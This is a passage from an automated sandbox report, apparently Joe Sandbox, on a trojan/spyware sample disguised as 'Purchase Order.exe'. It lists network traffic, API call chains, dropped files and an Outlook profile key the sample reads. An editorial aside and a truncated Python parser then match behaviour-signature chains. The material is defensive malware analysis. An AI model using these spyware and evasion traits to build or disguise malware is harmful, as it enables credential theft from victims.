Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036A17000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.0000000036A08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036A08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/p
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_0040524E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040524E

System Summary

Source: initial sample Static PE information: Filename: Purchase Order.exe
Source: C:\Users\user\Desktop\Purchase Order.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004032BF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_004032BF
Source: C:\Users\user\Desktop\Purchase Order.exe File created: C:\Windows\SysWOW64\lamellate.ini Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D18D28 4_2_39D18D28
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D3D0D0 4_2_39D3D0D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D36A80 4_2_39D36A80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D3E060 4_2_39D3E060
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D357C0 4_2_39D357C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D325C0 4_2_39D325C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D341E0 4_2_39D341E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D30FE0 4_2_39D30FE0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33B90 4_2_39D33B90
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D35180 4_2_39D35180
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D31F80 4_2_39D31F80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33BA0 4_2_39D33BA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D309A0 4_2_39D309A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D34B40 4_2_39D34B40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D31940 4_2_39D31940
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D36760 4_2_39D36760
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33560 4_2_39D33560
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D30360 4_2_39D30360
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D36110 4_2_39D36110
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D34500 4_2_39D34500
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D31300 4_2_39D31300
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D36120 4_2_39D36120
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D32F20 4_2_39D32F20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33EC0 4_2_39D33EC0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D30CC0 4_2_39D30CC0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D3F2C0 4_2_39D3F2C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D344F1 4_2_39D344F1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D35AE0 4_2_39D35AE0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D328E0 4_2_39D328E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33880 4_2_39D33880
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D30680 4_2_39D30680
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D3F2B0 4_2_39D3F2B0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D354A0 4_2_39D354A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D322A0 4_2_39D322A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33240 4_2_39D33240
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D30040 4_2_39D30040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D36440 4_2_39D36440
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D34E60 4_2_39D34E60
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D31C60 4_2_39D31C60
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D39611 4_2_39D39611
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D35E00 4_2_39D35E00
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D32C00 4_2_39D32C00
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D34820 4_2_39D34820
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D31620 4_2_39D31620
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4F1A0 4_2_39D4F1A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D41360 4_2_39D41360
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4F4C0 4_2_39D4F4C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D47AE0 4_2_39D47AE0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D409D0 4_2_39D409D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D429D0 4_2_39D429D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4DBC0 4_2_39D4DBC0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4A9C0 4_2_39D4A9C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D409C1 4_2_39D409C1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4F7CF 4_2_39D4F7CF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4F7E0 4_2_39D4F7E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4C5E0 4_2_39D4C5E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D493E0 4_2_39D493E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4A380 4_2_39D4A380
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4D580 4_2_39D4D580
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4BFA0 4_2_39D4BFA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D48DA0 4_2_39D48DA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D41350 4_2_39D41350
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4CF40 4_2_39D4CF40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D49D40 4_2_39D49D40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4EB60 4_2_39D4EB60
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D48760 4_2_39D48760
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4B960 4_2_39D4B960
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4FB00 4_2_39D4FB00
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D49700 4_2_39D49700
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4C900 4_2_39D4C900
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D40508 4_2_39D40508
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4B320 4_2_39D4B320
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D48120 4_2_39D48120
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4E520 4_2_39D4E520
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4C2C0 4_2_39D4C2C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D490C0 4_2_39D490C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D404F9 4_2_39D404F9
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4DEE0 4_2_39D4DEE0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4ACE0 4_2_39D4ACE0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D40E98 4_2_39D40E98
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D40E87 4_2_39D40E87
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4BC80 4_2_39D4BC80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D48A80 4_2_39D48A80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4EE80 4_2_39D4EE80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4C2B1 4_2_39D4C2B1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4A6A0 4_2_39D4A6A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4D8A0 4_2_39D4D8A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4E840 4_2_39D4E840
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D40040 4_2_39D40040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D48440 4_2_39D48440
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4B640 4_2_39D4B640
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4D260 4_2_39D4D260
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4A060 4_2_39D4A060
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D40011 4_2_39D40011
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4E200 4_2_39D4E200
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D47E00 4_2_39D47E00
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4B000 4_2_39D4B000
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4CC20 4_2_39D4CC20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D49A20 4_2_39D49A20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1868 4_2_39EA1868
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1F50 4_2_39EA1F50
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1180 4_2_39EA1180
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA0AA0 4_2_39EA0AA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA2D20 4_2_39EA2D20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA03B8 4_2_39EA03B8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA2638 4_2_39EA2638
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1859 4_2_39EA1859
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1F41 4_2_39EA1F41
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1170 4_2_39EA1170
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA0A91 4_2_39EA0A91
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA2D10 4_2_39EA2D10
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA0040 4_2_39EA0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA0027 4_2_39EA0027
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA03A8 4_2_39EA03A8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA2628 4_2_39EA2628
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39F81240 4_2_39F81240
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39F88D58 4_2_39F88D58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39F81E58 4_2_39F81E58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: String function: 00402ACE appears 52 times
Source: Purchase Order.exe Static PE information: invalid certificate
Source: Purchase Order.exe, 00000004.00000002.3383976496.0000000036697000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase Order.exe
Source: Purchase Order.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/18@3/4
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004032BF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_004032BF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_0040451A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_0040451A
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar, 0_2_004020CD
Source: C:\Users\user\Desktop\Purchase Order.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Purchase Order.exe File created: C:\Users\user\AppData\Local\Temp\nsq3120.tmp Jump to behavior
Source: Purchase Order.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase Order.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Purchase Order.exe Virustotal: Detection: 12%
Source: C:\Users\user\Desktop\Purchase Order.exe File read: C:\Users\user\Desktop\Purchase Order.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe" Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File written: C:\ProgramData\ankomstperrons.ini Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Purchase Order.exe Static file information: File size 1055136 > 1048576
Source: Purchase Order.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match File source: 00000000.00000002.2755799259.0000000005F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
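A practitioner reading the two call chains singled out above (0_2_004032BF at the entry point, and 0_2_10001A5D) should weigh what they actually describe. The entry-point chain, SetErrorMode first, GetTempPathA/GetWindowsDirectoryA path building, and a tail of GetCurrentProcess/OpenProcessToken/LookupPrivilegeValueA/AdjustTokenPrivileges/ExitWindowsEx, is the shape of the stock NSIS installer stub, whose reboot-on-exit path is what carries ExitWindowsEx; the ns*.tmp files and the dropped System.dll elsewhere in this report point the same way. The GetModuleHandleA/LoadLibraryA/GetProcAddress chain sits in a module based at 0x10000000, which is consistent with that System.dll plugin, a component that resolves APIs by name by design. The hits are real, but they characterise the installer wrapper rather than the payload it unpacks. The Python below is an added example written for this page, not Joe Sandbox code and not part of the report: it parses "Code function" entries and matches ordered API subsequences, the same form most behavioural signatures take. The two report lines are embedded as constructed copies; the rule names and the A/W-suffix normalisation are the editor's choices.

```python
import re
from typing import Dict, List, Tuple

# Constructed copies of two "Code function" entries from this report: the
# entry-point chain (0_2_004032BF) and the resolver chain at 0_2_10001A5D.
REPORT_LINES = [
    "Source: C:\\Users\\user\\Desktop\\Purchase Order.exe Code function: 0_2_004032BF "
    "EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,"
    "GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,"
    "GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,"
    "SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,"
    "ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,"
    "CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,"
    "AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004032BF",
    "Source: C:\\Users\\user\\Desktop\\Purchase Order.exe Code function: 0_2_10001A5D "
    "GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,"
    "GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,"
    "lstrlenA, 0_2_10001A5D",
]

# Ordered API subsequences (gaps allowed), the way behaviour signatures are
# usually expressed. Rule names are hypothetical; the call orders are the
# documented sequences for each behaviour.
CHAINS: Dict[str, List[str]] = {
    "token-privilege-then-shutdown": [
        "OpenProcessToken", "LookupPrivilegeValue",
        "AdjustTokenPrivileges", "ExitWindowsEx",
    ],
    "dynamic-api-resolution": ["LoadLibrary", "GetProcAddress"],
}

# "Code function: <id> <api,api,...,> <id>": the id is repeated at the end.
_ENTRY = re.compile(r"Code function: (\S+) (.*?) \1$")


def parse_entry(line: str) -> Tuple[str, List[str]]:
    """Return (function id, [api, ...]) for one 'Code function' report line."""
    m = _ENTRY.search(line.strip())
    if not m:
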